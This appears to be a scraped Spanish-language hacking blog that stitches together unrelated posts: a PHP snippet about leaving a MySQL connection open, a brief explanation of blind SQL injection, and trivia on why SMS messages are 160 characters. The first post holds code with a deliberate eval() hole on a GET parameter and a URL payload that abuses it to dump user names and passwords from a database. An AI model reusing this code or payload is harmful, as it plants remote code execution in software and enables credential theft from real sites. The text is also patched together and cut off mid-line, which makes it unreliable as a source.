Programing iDeas

Bueno, despues de mucho tiempo, vuelvo a postear un poco de contenido en este blog que lo tuve abandonado por un largo tiempo. Hoy, veremos la importancia que tiene la funcion mysql_close() al momento de cerrar una conexion MySql con PHP. Algunos admins por no decir la mayoria, no lo usan ya que piensan que la conexion, se cierra completamente al final el script, y muchos otros no le dan importancia.

Primeramente, como es de esperar, nos veremos con el code vulnerable:

$la = $_GET['v'];
$server='localhost';
$user='root';
$pass='';
$db='alumnos';

$conexion=mysql_connect($server,$user,$pass)
or die("Problemas en la conexion");
mysql_select_db($db,$conexion);

if(mysql_query('select * from users where d=1'))    {
echo "Consulta ejecutada";
}else    {
echo "No se pudo ejecutar la consulta";
    }
if(isset($la)) {

eval($la);
 }?>

En este caso particular, como no se ha cerrado la conexion SQL y tampoco ha finalizado el script, todavia se puede hacer uso productivo de la conexion SQL. ¿Que podemos hacer?
Simple, lo que la imaginacion nos de :)

http://localhost/la.php?v=$sql=mysql_query('select * from users'); while($r=mysql_fetch_assoc($sql)) { echo "
".$r['name']." ".$r['password']."
";}

Fuente: http://yoyahack.blogspot.com/search/label/php

Saludos Dr [F]

Saludos
 
Se los dejo en un .txt, para que no haya problemas, saludos :)

Ataque a ciegas de inyeccion SQL. Es una tecnica de ataque que utiliza inyeccion sql. Cuando una web por motivos de seguridad no muestra mensajes de error de la base de datos, al no devolver informacion se muestra siempre el mismo contenido (y solo se mostrara el poco contenido que hay si el resultado es correcto)

Los administradores de los sitios desactivan el SHOW_ERRORS y SHOW_WARNINGS para que no se muestren posibles erorres provocados en el interprete Sql. Estos errores son utilizado por SqLi para obtener informacion para concretar dicho ataque.
En Sqli podemos atacar sin necesidad de esta informacion. Una aplicacion web recibe datos desde el cliente. Los datos que realizamos en id en el caso de este tutorial, se utilizan para construir la consulta Sql.
En una SQLi normal cuando enviamos en la variable vulnerable la consulta nos imprime el resultado. Pero en BSQLi no nos imprime nada. Apartir de si muestra informacion o no muestra, inyectamos valores true o false.


PD: Con el tutorial lo van a entender mejor..


Saludos

La razon por que los mensajes no pueden exceder los 160 caracteres de longitud. Al parecer, en sus comienzos los sms se pensaron como mensajes de control, no como un servicio a disposicion del usuario y de hecho van por canales de control y no por los de voz.

La inclusion de SMS estaba apunto de ser una idea que estaba apunto de ser descartada de las especificaciones GSM ya que no se le veia ningun futuro. jajaja. Parecido a los que decian que internet no iba a tener futuro jajaj.

De hecho el estándar permite 140 bytes de "user data" o "payload". Para aprovecharlos mejor, se usa una codificación de 7 bits por carácter, con lo cual de los 140 * 8 = 1120 bits te salen 1120 / 7 = 160 caracteres codificados en 7 bits.

Otro dato de interés es que los SMS provocaron la caída de la red GSM en múltiples ocasiones puesto que los enlaces troncales de señalización eran de muy bajo tráfico. El caso es que como nadie se esperaba el éxito de los mensajitos cortos, éstos colapsaron el medio y por tanto los teléfonos dejaron de funcionar. Por esta razón hubo que redimensionar la red de señalización.

Fuente: